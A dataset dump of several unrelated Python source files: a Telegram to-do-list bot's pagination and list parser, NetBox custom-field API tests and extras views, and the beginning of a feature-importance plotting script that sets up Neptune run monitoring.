metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "joshcoales/todolistbot",
"score": 3
} |
#### File: todolistbot/todo_list_bot/response.py
```python
from typing import List, Optional, Dict
from telethon import Button
from telethon.tl.types import KeyboardButtonCallback
class Response:
per_page = 6
text_length_limit = 4096
def __init__(self, text: str, buttons: Optional[List[KeyboardButtonCallback]] = None):
self._text = text
self.all_buttons = buttons
self.page = 1
def prefix(self, prefix: str) -> None:
self._text = prefix + self._text
@property
def text(self) -> str:
truncated = self._text[:self.text_length_limit - 4]
if truncated != self._text:
truncated += "\n..."
return truncated
@property
def pages(self) -> Optional[int]:
if self.all_buttons is None:
return None
return ((len(self.all_buttons) - 1) // self.per_page) + 1
@property
def has_next(self) -> bool:
if self.pages == 1 or self.all_buttons is None:
return False
return self.page < self.pages
@property
def has_prev(self) -> bool:
if self.pages == 1 or self.all_buttons is None:
return False
return self.page > 1
def buttons(self) -> Optional[List[List[KeyboardButtonCallback]]]:
if self.all_buttons is None:
return None
buttons = self.all_buttons[(self.page - 1) * self.per_page: self.page * self.per_page]
if self.pages == 1:
return [[b] for b in buttons]
page_buttons = [
Button.inline(
"< Prev" if self.has_prev else " ",
f"page:{self.page - 1}" if self.has_prev else f"page:{self.page}"
),
Button.inline(
"> Next" if self.has_next else " ",
f"page:{self.page + 1}" if self.has_next else f"page:{self.page}"
)
]
return [
*([b] for b in buttons),
page_buttons
]
def to_json(self) -> Dict:
return {
"text": self.text,
"all_buttons": [
{
"text": button.text,
"data": button.data.decode()
} for button in self.all_buttons
] if self.all_buttons is not None else None,
"page": self.page
}
@classmethod
def from_json(cls, data: Dict) -> 'Response':
response = Response(
data["text"],
[Button.inline(d["text"], d["data"]) for d in data["all_buttons"]] if data["all_buttons"] is not None else None
)
response.page = data["page"]
return response
```
#### File: todolistbot/todo_list_bot/todo_list.py
```python
from abc import ABC, abstractmethod
from enum import Enum
from typing import List, Optional, Dict, Tuple
from prometheus_client import Counter
list_parsed = Counter("todolistbot_parse_list_total", "Number of todo lists parsed")
sections_parsed = Counter("todolistbot_parse_section_total", "Number of todo list sections parsed")
items_parsed = Counter("todolistbot_parse_items_total", "Number of todo list items parsed")
def line_is_section(line: str) -> bool:
return line.startswith("#")
def line_is_empty(line: str) -> bool:
return line.strip() == ""
def line_is_item(line: str) -> bool:
return not line_is_empty(line) and not line_is_section(line)
# noinspection PyMethodMayBeStatic
class TodoList:
def __init__(self, path: str):
self.path = path
self.root_section = TodoSection("root", 0, None)
def parse(self) -> None:
list_parsed.inc()
with open(self.path, "r") as f:
contents = f.readlines()
self.parse_lines(contents)
def parse_lines(self, contents: List[str], current_section: Optional['TodoSection'] = None):
current_section = current_section or self.root_section
current_item = None
for line in contents:
if line_is_empty(line):
continue
if line_is_section(line):
current_section = self.parse_section(line, current_section)
current_item = None
else:
current_item = self.parse_item(line, current_section, current_item)
def parse_section(self, line: str, current_section: 'TodoSection') -> 'TodoSection':
sections_parsed.inc()
section_title = line.lstrip("#")
section_depth = len(line) - len(section_title)
section_title = section_title.strip()
if section_depth > current_section.depth:
parent_section = current_section
else:
while section_depth <= current_section.depth:
current_section = current_section.parent_section
parent_section = current_section
return TodoSection(section_title, section_depth, parent_section)
def parse_item(self, line: str, current_section: 'TodoSection', current_item: Optional['TodoItem']) -> 'TodoItem':
items_parsed.inc()
status, line = self.parse_status(line)
item_text = line.lstrip(" -")
item_depth = len(line) - len(item_text)
item_text = item_text.strip()
if current_item is None:
parent_item = None
elif item_depth > current_item.depth:
parent_item = current_item
else:
parent_item = current_item
while item_depth <= parent_item.depth:
if parent_item.parent_item is not None:
parent_item = parent_item.parent_item
else:
parent_item = None
break
return TodoItem(status, item_text, item_depth, current_section, parent_item)
def parse_status(self, line: str) -> Tuple['TodoStatus', str]:
status = TodoStatus.TODO
for enum_status in TodoStatus:
if line.startswith(enum_status.value):
status = enum_status
line = line[len(enum_status.value):]
break
return status, line
def to_text(self, section: Optional['TodoSection'] = None) -> str:
section = section or self.root_section
max_length = 4096
text = section.to_text()
if len(text) < max_length:
return text
max_depth = 10
while len(section.to_text(max_depth)) > max_length and max_depth >= 1:
max_depth -= 1
return section.to_text(max_depth)
def save(self) -> None:
with open(self.path, "w") as f:
f.write(self.root_section.to_text())
def to_json(self) -> Dict:
return {
"path": self.path
}
@classmethod
def from_json(cls, data: Dict) -> 'TodoList':
todo = TodoList(data["path"])
todo.parse()
return todo
class TodoContainer(ABC):
def __init__(self, parent_section: Optional['TodoSection']):
self.parent_section: Optional[TodoSection] = parent_section
@property
@abstractmethod
def parent(self) -> Optional['TodoContainer']:
raise NotImplementedError
@abstractmethod
def remove(self) -> None:
raise NotImplementedError
@abstractmethod
def is_empty(self) -> bool:
raise NotImplementedError
@abstractmethod
def to_text(self, max_depth: Optional[int] = None) -> str:
raise NotImplementedError
class TodoSection(TodoContainer):
def __init__(self, title: str, depth: int, parent: Optional['TodoSection']):
super().__init__(parent)
self.title: str = title
self.depth: int = depth
self.sub_sections: List['TodoSection'] = []
if parent:
parent.sub_sections.append(self)
self.root_items: List['TodoItem'] = []
@property
def parent(self) -> Optional['TodoSection']:
return self.parent_section
def is_empty(self) -> bool:
return not self.sub_sections and not self.root_items
def remove(self) -> None:
if self.parent_section:
self.parent_section.sub_sections.remove(self)
def to_text(self, max_depth: Optional[int] = None) -> str:
lines = []
if self.depth != 0:
lines += ["#" * self.depth + " " + self.title]
if max_depth is None:
lines += [item.to_text(max_depth) for item in self.root_items]
if max_depth is None or self.depth < max_depth:
lines += [("\n" if max_depth is None else "") + section.to_text(max_depth) for section in self.sub_sections]
return "\n".join(lines)
class TodoItem(TodoContainer):
def __init__(
self,
status: 'TodoStatus',
name: str,
depth: int,
parent_section: TodoSection,
parent_item: Optional['TodoItem']
):
super().__init__(parent_section)
self.status: 'TodoStatus' = status
self.name: str = name
self.depth: int = depth
self.parent_item: Optional['TodoItem'] = parent_item
self.sub_items: List['TodoItem'] = []
if parent_item:
parent_item.sub_items.append(self)
else:
parent_section.root_items.append(self)
@property
def parent(self) -> TodoContainer:
if self.parent_item:
return self.parent_item
return self.parent_section
def is_empty(self) -> bool:
return not self.sub_items
def remove(self) -> None:
if self.parent_item:
self.parent_item.sub_items.remove(self)
else:
self.parent_section.root_items.remove(self)
def to_text(self, max_depth: Optional[int] = None) -> str:
lines = [self.status.value + ("- " * self.depth)[:self.depth] + self.name]
if not max_depth or (self.parent_item.depth + self.depth) < max_depth:
lines += [item.to_text(max_depth) for item in self.sub_items]
return "\n".join(lines)
class TodoStatus(Enum):
COMPLETE = "DONE"
IN_PROGRESS = "INP"
TODO = ""
``` |
{
"source": "joshcorr/netbox",
"score": 2
} |
#### File: extras/tests/test_customfields.py
```python
from datetime import date
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from dcim.models import Site
from extras.constants import CF_TYPE_TEXT, CF_TYPE_INTEGER, CF_TYPE_BOOLEAN, CF_TYPE_DATE, CF_TYPE_SELECT, CF_TYPE_URL, CF_TYPE_SELECT
from extras.models import CustomField, CustomFieldValue, CustomFieldChoice
from utilities.testing import APITestCase
from virtualization.models import VirtualMachine
class CustomFieldTest(TestCase):
def setUp(self):
Site.objects.bulk_create([
Site(name='Site A', slug='site-a'),
Site(name='Site B', slug='site-b'),
Site(name='Site C', slug='site-c'),
])
def test_simple_fields(self):
DATA = (
{'field_type': CF_TYPE_TEXT, 'field_value': 'Foobar!', 'empty_value': ''},
{'field_type': CF_TYPE_INTEGER, 'field_value': 0, 'empty_value': None},
{'field_type': CF_TYPE_INTEGER, 'field_value': 42, 'empty_value': None},
{'field_type': CF_TYPE_BOOLEAN, 'field_value': True, 'empty_value': None},
{'field_type': CF_TYPE_BOOLEAN, 'field_value': False, 'empty_value': None},
{'field_type': CF_TYPE_DATE, 'field_value': date(2016, 6, 23), 'empty_value': None},
{'field_type': CF_TYPE_URL, 'field_value': 'http://example.com/', 'empty_value': ''},
)
obj_type = ContentType.objects.get_for_model(Site)
for data in DATA:
# Create a custom field
cf = CustomField(type=data['field_type'], name='my_field', required=False)
cf.save()
cf.obj_type.set([obj_type])
cf.save()
# Assign a value to the first Site
site = Site.objects.first()
cfv = CustomFieldValue(field=cf, obj_type=obj_type, obj_id=site.id)
cfv.value = data['field_value']
cfv.save()
# Retrieve the stored value
cfv = CustomFieldValue.objects.filter(obj_type=obj_type, obj_id=site.pk).first()
self.assertEqual(cfv.value, data['field_value'])
# Delete the stored value
cfv.value = data['empty_value']
cfv.save()
self.assertEqual(CustomFieldValue.objects.filter(obj_type=obj_type, obj_id=site.pk).count(), 0)
# Delete the custom field
cf.delete()
def test_select_field(self):
obj_type = ContentType.objects.get_for_model(Site)
# Create a custom field
cf = CustomField(type=CF_TYPE_SELECT, name='my_field', required=False)
cf.save()
cf.obj_type.set([obj_type])
cf.save()
# Create some choices for the field
CustomFieldChoice.objects.bulk_create([
CustomFieldChoice(field=cf, value='Option A'),
CustomFieldChoice(field=cf, value='Option B'),
CustomFieldChoice(field=cf, value='Option C'),
])
# Assign a value to the first Site
site = Site.objects.first()
cfv = CustomFieldValue(field=cf, obj_type=obj_type, obj_id=site.id)
cfv.value = cf.choices.first()
cfv.save()
# Retrieve the stored value
cfv = CustomFieldValue.objects.filter(obj_type=obj_type, obj_id=site.pk).first()
self.assertEqual(str(cfv.value), 'Option A')
# Delete the stored value
cfv.value = None
cfv.save()
self.assertEqual(CustomFieldValue.objects.filter(obj_type=obj_type, obj_id=site.pk).count(), 0)
# Delete the custom field
cf.delete()
class CustomFieldAPITest(APITestCase):
def setUp(self):
super().setUp()
content_type = ContentType.objects.get_for_model(Site)
# Text custom field
self.cf_text = CustomField(type=CF_TYPE_TEXT, name='magic_word')
self.cf_text.save()
self.cf_text.obj_type.set([content_type])
self.cf_text.save()
# Integer custom field
self.cf_integer = CustomField(type=CF_TYPE_INTEGER, name='magic_number')
self.cf_integer.save()
self.cf_integer.obj_type.set([content_type])
self.cf_integer.save()
# Boolean custom field
self.cf_boolean = CustomField(type=CF_TYPE_BOOLEAN, name='is_magic')
self.cf_boolean.save()
self.cf_boolean.obj_type.set([content_type])
self.cf_boolean.save()
# Date custom field
self.cf_date = CustomField(type=CF_TYPE_DATE, name='magic_date')
self.cf_date.save()
self.cf_date.obj_type.set([content_type])
self.cf_date.save()
# URL custom field
self.cf_url = CustomField(type=CF_TYPE_URL, name='magic_url')
self.cf_url.save()
self.cf_url.obj_type.set([content_type])
self.cf_url.save()
# Select custom field
self.cf_select = CustomField(type=CF_TYPE_SELECT, name='magic_choice')
self.cf_select.save()
self.cf_select.obj_type.set([content_type])
self.cf_select.save()
self.cf_select_choice1 = CustomFieldChoice(field=self.cf_select, value='Foo')
self.cf_select_choice1.save()
self.cf_select_choice2 = CustomFieldChoice(field=self.cf_select, value='Bar')
self.cf_select_choice2.save()
self.cf_select_choice3 = CustomFieldChoice(field=self.cf_select, value='Baz')
self.cf_select_choice3.save()
self.site = Site.objects.create(name='Test Site 1', slug='test-site-1')
def test_get_obj_without_custom_fields(self):
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.site.name)
self.assertEqual(response.data['custom_fields'], {
'magic_word': None,
'magic_number': None,
'is_magic': None,
'magic_date': None,
'magic_url': None,
'magic_choice': None,
})
def test_get_obj_with_custom_fields(self):
CUSTOM_FIELD_VALUES = [
(self.cf_text, 'Test string'),
(self.cf_integer, 1234),
(self.cf_boolean, True),
(self.cf_date, date(2016, 6, 23)),
(self.cf_url, 'http://example.com/'),
(self.cf_select, self.cf_select_choice1.pk),
]
for field, value in CUSTOM_FIELD_VALUES:
cfv = CustomFieldValue(field=field, obj=self.site)
cfv.value = value
cfv.save()
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.site.name)
self.assertEqual(response.data['custom_fields'].get('magic_word'), CUSTOM_FIELD_VALUES[0][1])
self.assertEqual(response.data['custom_fields'].get('magic_number'), CUSTOM_FIELD_VALUES[1][1])
self.assertEqual(response.data['custom_fields'].get('is_magic'), CUSTOM_FIELD_VALUES[2][1])
self.assertEqual(response.data['custom_fields'].get('magic_date'), CUSTOM_FIELD_VALUES[3][1])
self.assertEqual(response.data['custom_fields'].get('magic_url'), CUSTOM_FIELD_VALUES[4][1])
self.assertEqual(response.data['custom_fields'].get('magic_choice'), {
'value': self.cf_select_choice1.pk, 'label': 'Foo'
})
def test_set_custom_field_text(self):
data = {
'name': 'Test Site 1',
'slug': 'test-site-1',
'custom_fields': {
'magic_word': 'Foo bar baz',
}
}
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.put(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data['custom_fields'].get('magic_word'), data['custom_fields']['magic_word'])
cfv = self.site.custom_field_values.get(field=self.cf_text)
self.assertEqual(cfv.value, data['custom_fields']['magic_word'])
def test_set_custom_field_integer(self):
data = {
'name': 'Test Site 1',
'slug': 'test-site-1',
'custom_fields': {
'magic_number': 42,
}
}
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.put(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data['custom_fields'].get('magic_number'), data['custom_fields']['magic_number'])
cfv = self.site.custom_field_values.get(field=self.cf_integer)
self.assertEqual(cfv.value, data['custom_fields']['magic_number'])
def test_set_custom_field_boolean(self):
data = {
'name': 'Test Site 1',
'slug': 'test-site-1',
'custom_fields': {
'is_magic': 0,
}
}
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.put(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data['custom_fields'].get('is_magic'), data['custom_fields']['is_magic'])
cfv = self.site.custom_field_values.get(field=self.cf_boolean)
self.assertEqual(cfv.value, data['custom_fields']['is_magic'])
def test_set_custom_field_date(self):
data = {
'name': 'Test Site 1',
'slug': 'test-site-1',
'custom_fields': {
'magic_date': '2017-04-25',
}
}
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.put(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data['custom_fields'].get('magic_date'), data['custom_fields']['magic_date'])
cfv = self.site.custom_field_values.get(field=self.cf_date)
self.assertEqual(cfv.value.isoformat(), data['custom_fields']['magic_date'])
def test_set_custom_field_url(self):
data = {
'name': 'Test Site 1',
'slug': 'test-site-1',
'custom_fields': {
'magic_url': 'http://example.com/2/',
}
}
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.put(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data['custom_fields'].get('magic_url'), data['custom_fields']['magic_url'])
cfv = self.site.custom_field_values.get(field=self.cf_url)
self.assertEqual(cfv.value, data['custom_fields']['magic_url'])
def test_set_custom_field_select(self):
data = {
'name': 'Test Site 1',
'slug': 'test-site-1',
'custom_fields': {
'magic_choice': self.cf_select_choice2.pk,
}
}
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.put(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data['custom_fields'].get('magic_choice'), data['custom_fields']['magic_choice'])
cfv = self.site.custom_field_values.get(field=self.cf_select)
self.assertEqual(cfv.value.pk, data['custom_fields']['magic_choice'])
def test_set_custom_field_defaults(self):
"""
Create a new object with no custom field data. Custom field values should be created using the custom fields'
default values.
"""
CUSTOM_FIELD_DEFAULTS = {
'magic_word': 'foobar',
'magic_number': '123',
'is_magic': 'true',
'magic_date': '2019-12-13',
'magic_url': 'http://example.com/',
'magic_choice': self.cf_select_choice1.value,
}
# Update CustomFields to set default values
for field_name, default_value in CUSTOM_FIELD_DEFAULTS.items():
CustomField.objects.filter(name=field_name).update(default=default_value)
data = {
'name': 'Test Site X',
'slug': 'test-site-x',
}
url = reverse('dcim-api:site-list')
response = self.client.post(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(response.data['custom_fields']['magic_word'], CUSTOM_FIELD_DEFAULTS['magic_word'])
self.assertEqual(response.data['custom_fields']['magic_number'], str(CUSTOM_FIELD_DEFAULTS['magic_number']))
self.assertEqual(response.data['custom_fields']['is_magic'], bool(CUSTOM_FIELD_DEFAULTS['is_magic']))
self.assertEqual(response.data['custom_fields']['magic_date'], CUSTOM_FIELD_DEFAULTS['magic_date'])
self.assertEqual(response.data['custom_fields']['magic_url'], CUSTOM_FIELD_DEFAULTS['magic_url'])
self.assertEqual(response.data['custom_fields']['magic_choice'], self.cf_select_choice1.pk)
class CustomFieldChoiceAPITest(APITestCase):
def setUp(self):
super().setUp()
vm_content_type = ContentType.objects.get_for_model(VirtualMachine)
self.cf_1 = CustomField.objects.create(name="cf_1", type=CF_TYPE_SELECT)
self.cf_2 = CustomField.objects.create(name="cf_2", type=CF_TYPE_SELECT)
self.cf_choice_1 = CustomFieldChoice.objects.create(field=self.cf_1, value="cf_field_1", weight=100)
self.cf_choice_2 = CustomFieldChoice.objects.create(field=self.cf_1, value="cf_field_2", weight=50)
self.cf_choice_3 = CustomFieldChoice.objects.create(field=self.cf_2, value="cf_field_3", weight=10)
def test_list_cfc(self):
url = reverse('extras-api:custom-field-choice-list')
response = self.client.get(url, **self.header)
self.assertEqual(len(response.data), 2)
self.assertEqual(len(response.data[self.cf_1.name]), 2)
self.assertEqual(len(response.data[self.cf_2.name]), 1)
self.assertTrue(self.cf_choice_1.value in response.data[self.cf_1.name])
self.assertTrue(self.cf_choice_2.value in response.data[self.cf_1.name])
self.assertTrue(self.cf_choice_3.value in response.data[self.cf_2.name])
self.assertEqual(self.cf_choice_1.pk, response.data[self.cf_1.name][self.cf_choice_1.value])
self.assertEqual(self.cf_choice_2.pk, response.data[self.cf_1.name][self.cf_choice_2.value])
self.assertEqual(self.cf_choice_3.pk, response.data[self.cf_2.name][self.cf_choice_3.value])
```
#### File: netbox/extras/views.py
```python
from django import template
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.contrib.contenttypes.models import ContentType
from django.db.models import Count, Q
from django.http import Http404, HttpResponseForbidden
from django.shortcuts import get_object_or_404, redirect, render
from django.utils.safestring import mark_safe
from django.views.generic import View
from django_tables2 import RequestConfig
from utilities.forms import ConfirmationForm
from utilities.paginator import EnhancedPaginator
from utilities.views import BulkDeleteView, BulkEditView, ObjectDeleteView, ObjectEditView, ObjectListView
from . import filters, forms
from .models import ConfigContext, ImageAttachment, ObjectChange, ReportResult, Tag, TaggedItem
from .reports import get_report, get_reports
from .scripts import get_scripts, run_script
from .tables import ConfigContextTable, ObjectChangeTable, TagTable, TaggedItemTable
#
# Tags
#
class TagListView(PermissionRequiredMixin, ObjectListView):
permission_required = 'extras.view_tag'
queryset = Tag.objects.annotate(
items=Count('extras_taggeditem_items', distinct=True)
).order_by(
'name'
)
filter = filters.TagFilter
filter_form = forms.TagFilterForm
table = TagTable
template_name = 'extras/tag_list.html'
class TagView(View):
def get(self, request, slug):
tag = get_object_or_404(Tag, slug=slug)
tagged_items = TaggedItem.objects.filter(
tag=tag
).prefetch_related(
'content_type', 'content_object'
)
# Generate a table of all items tagged with this Tag
items_table = TaggedItemTable(tagged_items)
paginate = {
'paginator_class': EnhancedPaginator,
'per_page': request.GET.get('per_page', settings.PAGINATE_COUNT)
}
RequestConfig(request, paginate).configure(items_table)
return render(request, 'extras/tag.html', {
'tag': tag,
'items_count': tagged_items.count(),
'items_table': items_table,
})
class TagEditView(PermissionRequiredMixin, ObjectEditView):
permission_required = 'extras.change_tag'
model = Tag
model_form = forms.TagForm
default_return_url = 'extras:tag_list'
template_name = 'extras/tag_edit.html'
class TagDeleteView(PermissionRequiredMixin, ObjectDeleteView):
permission_required = 'extras.delete_tag'
model = Tag
default_return_url = 'extras:tag_list'
class TagBulkEditView(PermissionRequiredMixin, BulkEditView):
permission_required = 'extras.change_tag'
queryset = Tag.objects.annotate(
items=Count('extras_taggeditem_items', distinct=True)
).order_by(
'name'
)
# filter = filters.ProviderFilter
table = TagTable
form = forms.TagBulkEditForm
default_return_url = 'circuits:provider_list'
class TagBulkDeleteView(PermissionRequiredMixin, BulkDeleteView):
permission_required = 'extras.delete_tag'
queryset = Tag.objects.annotate(
items=Count('extras_taggeditem_items')
).order_by(
'name'
)
table = TagTable
default_return_url = 'extras:tag_list'
#
# Config contexts
#
class ConfigContextListView(PermissionRequiredMixin, ObjectListView):
permission_required = 'extras.view_configcontext'
queryset = ConfigContext.objects.all()
filter = filters.ConfigContextFilter
filter_form = forms.ConfigContextFilterForm
table = ConfigContextTable
template_name = 'extras/configcontext_list.html'
class ConfigContextView(PermissionRequiredMixin, View):
permission_required = 'extras.view_configcontext'
def get(self, request, pk):
configcontext = get_object_or_404(ConfigContext, pk=pk)
return render(request, 'extras/configcontext.html', {
'configcontext': configcontext,
})
class ConfigContextCreateView(PermissionRequiredMixin, ObjectEditView):
permission_required = 'extras.add_configcontext'
model = ConfigContext
model_form = forms.ConfigContextForm
default_return_url = 'extras:configcontext_list'
template_name = 'extras/configcontext_edit.html'
class ConfigContextEditView(ConfigContextCreateView):
permission_required = 'extras.change_configcontext'
class ConfigContextBulkEditView(PermissionRequiredMixin, BulkEditView):
permission_required = 'extras.change_configcontext'
queryset = ConfigContext.objects.all()
filter = filters.ConfigContextFilter
table = ConfigContextTable
form = forms.ConfigContextBulkEditForm
default_return_url = 'extras:configcontext_list'
class ConfigContextDeleteView(PermissionRequiredMixin, ObjectDeleteView):
permission_required = 'extras.delete_configcontext'
model = ConfigContext
default_return_url = 'extras:configcontext_list'
class ConfigContextBulkDeleteView(PermissionRequiredMixin, BulkDeleteView):
permission_required = 'extras.delete_configcontext'
queryset = ConfigContext.objects.all()
table = ConfigContextTable
default_return_url = 'extras:configcontext_list'
class ObjectConfigContextView(View):
object_class = None
base_template = None
def get(self, request, pk):
obj = get_object_or_404(self.object_class, pk=pk)
source_contexts = ConfigContext.objects.get_for_object(obj)
model_name = self.object_class._meta.model_name
return render(request, 'extras/object_configcontext.html', {
model_name: obj,
'obj': obj,
'rendered_context': obj.get_config_context(),
'source_contexts': source_contexts,
'base_template': self.base_template,
'active_tab': 'config-context',
})
#
# Change logging
#
class ObjectChangeListView(PermissionRequiredMixin, ObjectListView):
permission_required = 'extras.view_objectchange'
queryset = ObjectChange.objects.prefetch_related('user', 'changed_object_type')
filter = filters.ObjectChangeFilter
filter_form = forms.ObjectChangeFilterForm
table = ObjectChangeTable
template_name = 'extras/objectchange_list.html'
class ObjectChangeView(PermissionRequiredMixin, View):
permission_required = 'extras.view_objectchange'
def get(self, request, pk):
objectchange = get_object_or_404(ObjectChange, pk=pk)
related_changes = ObjectChange.objects.filter(request_id=objectchange.request_id).exclude(pk=objectchange.pk)
related_changes_table = ObjectChangeTable(
data=related_changes[:50],
orderable=False
)
return render(request, 'extras/objectchange.html', {
'objectchange': objectchange,
'related_changes_table': related_changes_table,
'related_changes_count': related_changes.count()
})
class ObjectChangeLogView(View):
"""
Present a history of changes made to a particular object.
"""
def get(self, request, model, **kwargs):
# Get object my model and kwargs (e.g. slug='foo')
obj = get_object_or_404(model, **kwargs)
# Gather all changes for this object (and its related objects)
content_type = ContentType.objects.get_for_model(model)
objectchanges = ObjectChange.objects.prefetch_related(
'user', 'changed_object_type'
).filter(
Q(changed_object_type=content_type, changed_object_id=obj.pk) |
Q(related_object_type=content_type, related_object_id=obj.pk)
)
objectchanges_table = ObjectChangeTable(
data=objectchanges,
orderable=False
)
# Apply the request context
paginate = {
'paginator_class': EnhancedPaginator,
'per_page': request.GET.get('per_page', settings.PAGINATE_COUNT)
}
RequestConfig(request, paginate).configure(objectchanges_table)
# Check whether a header template exists for this model
base_template = '{}/{}.html'.format(model._meta.app_label, model._meta.model_name)
try:
template.loader.get_template(base_template)
object_var = model._meta.model_name
except template.TemplateDoesNotExist:
base_template = '_base.html'
object_var = 'obj'
return render(request, 'extras/object_changelog.html', {
object_var: obj,
'table': objectchanges_table,
'base_template': base_template,
'active_tab': 'changelog',
})
#
# Image attachments
#
class ImageAttachmentEditView(PermissionRequiredMixin, ObjectEditView):
permission_required = 'extras.change_imageattachment'
model = ImageAttachment
model_form = forms.ImageAttachmentForm
def alter_obj(self, imageattachment, request, args, kwargs):
if not imageattachment.pk:
# Assign the parent object based on URL kwargs
model = kwargs.get('model')
imageattachment.parent = get_object_or_404(model, pk=kwargs['object_id'])
return imageattachment
def get_return_url(self, request, imageattachment):
return imageattachment.parent.get_absolute_url()
class ImageAttachmentDeleteView(PermissionRequiredMixin, ObjectDeleteView):
permission_required = 'extras.delete_imageattachment'
model = ImageAttachment
def get_return_url(self, request, imageattachment):
return imageattachment.parent.get_absolute_url()
#
# Reports
#
class ReportListView(PermissionRequiredMixin, View):
"""
Retrieve all of the available reports from disk and the recorded ReportResult (if any) for each.
"""
permission_required = 'extras.view_reportresult'
def get(self, request):
reports = get_reports()
results = {r.report: r for r in ReportResult.objects.all()}
ret = []
for module, report_list in reports:
module_reports = []
for report in report_list:
report.result = results.get(report.full_name, None)
module_reports.append(report)
ret.append((module, module_reports))
return render(request, 'extras/report_list.html', {
'reports': ret,
})
class ReportView(PermissionRequiredMixin, View):
"""
Display a single Report and its associated ReportResult (if any).
"""
permission_required = 'extras.view_reportresult'
def get(self, request, name):
# Retrieve the Report by "<module>.<report>"
module_name, report_name = name.split('.')
report = get_report(module_name, report_name)
if report is None:
raise Http404
# Attach the ReportResult (if any)
report.result = ReportResult.objects.filter(report=report.full_name).first()
return render(request, 'extras/report.html', {
'report': report,
'run_form': ConfirmationForm(),
})
class ReportRunView(PermissionRequiredMixin, View):
"""
Run a Report and record a new ReportResult.
"""
permission_required = 'extras.add_reportresult'
def post(self, request, name):
# Retrieve the Report by "<module>.<report>"
module_name, report_name = name.split('.')
report = get_report(module_name, report_name)
if report is None:
raise Http404
form = ConfirmationForm(request.POST)
if form.is_valid():
# Run the Report. A new ReportResult is created.
report.run()
result = 'failed' if report.failed else 'passed'
msg = "Ran report {} ({})".format(report.full_name, result)
messages.success(request, mark_safe(msg))
return redirect('extras:report', name=report.full_name)
#
# Scripts
#
class ScriptListView(PermissionRequiredMixin, View):
permission_required = 'extras.view_script'
def get(self, request):
return render(request, 'extras/script_list.html', {
'scripts': get_scripts(),
})
class ScriptView(PermissionRequiredMixin, View):
permission_required = 'extras.view_script'
def _get_script(self, module, name):
scripts = get_scripts()
try:
return scripts[module][name]()
except KeyError:
raise Http404
def get(self, request, module, name):
script = self._get_script(module, name)
form = script.as_form(initial=request.GET)
return render(request, 'extras/script.html', {
'module': module,
'script': script,
'form': form,
})
def post(self, request, module, name):
# Permissions check
if not request.user.has_perm('extras.run_script'):
return HttpResponseForbidden()
script = self._get_script(module, name)
form = script.as_form(request.POST, request.FILES)
output = None
execution_time = None
if form.is_valid():
commit = form.cleaned_data.pop('_commit')
output, execution_time = run_script(script, form.cleaned_data, request, commit)
return render(request, 'extras/script.html', {
'module': module,
'script': script,
'form': form,
'output': output,
'execution_time': execution_time,
})
``` |
{
"source": "joshcruz428/Deep-YouTube-Comment-Text-Generator",
"score": 3
} |
#### File: joshcruz428/Deep-YouTube-Comment-Text-Generator/commentRefiner.py
```python
import json_lines
import os
from hatesonar import Sonar
#Only includes the comments in a txt file, given that the comment has over a certain number of votes
#This also attempts to use Sonar to filter out hate speech
def refine_jsonl_file(path, votes_threshold=10, hate_limit=0.4, offensive_limit=0.7, general_limit=0.8):
sonar = Sonar()
name, _ = os.path.splitext(path)
refined_name = "refined_{name}.txt".format(name = name)
if os.path.exists(refined_name):
os.remove(refined_name)
refined_file = open(refined_name, mode='w')
with open(path, 'rb') as f: # opening file in binary(rb) mode
with refined_file as rf:
for item in json_lines.reader(f):
if int(item['votes']) > 0:
text = item['text']
hate_confidence = sonar.ping(text=text)['classes'][0]['confidence']
offensive_confidence = sonar.ping(text=text)['classes'][1]['confidence']
if not((hate_confidence > hate_limit) or (offensive_confidence > offensive_limit)
or (hate_confidence + offensive_confidence > general_limit)):
try:
print(text, file=rf)
except:
continue
rf.close()
f.close()
``` |
{
"source": "JoshCullinan/CCLDP",
"score": 3
} |
#### File: JoshCullinan/CCLDP/Code_submission.py
```python
import numpy as np
import pandas as pd
import math
import re
import time
import gc
import matplotlib.pyplot as plt
import seaborn as sns
def Model_Explore(trial_reg):
#Collect the feature importance, sort feature importance and the select the top 2-22 features
features = pd.DataFrame(index = trial_reg.feature_name(), data = trial_reg.feature_importance(importance_type='split'), columns = ['Feature_Weight'])
features.sort_values(by = 'Feature_Weight', ascending = False, inplace=True)
top100 = features.iloc(axis=0)[2:22]
#Create df for feature importance
top100.reset_index(inplace = True)
top100.columns = ['Feature', 'Feature Weight']
#Create seaborn plot
sns.set_style("whitegrid")
sns.set_context("paper")
plot = sns.barplot(x="Feature Weight", y="Feature", palette = "mako", data=top100.sort_values(by="Feature Weight", ascending=False))
return plot
if __name__ == '__main__':
#Create relative path names
import os
dirname = os.path.dirname(__file__)
#Neptune.ai for monitoring
import neptune
neptune.init(project_qualified_name='clljos001/CCLDP',
api_token='<KEY>
'''
This Code is usually used to import the omics datasets, feature engineer, and feature select.
It has been commented out for brevity, and speed up this training script.
Typically if the X & y set already exists it won't run.
'''
#Load in data, perform basic data manipulation, feature selection and removal of erroneous data.
#import Ingest
#files_to_imp = 'E'
#features_to_imp = 500
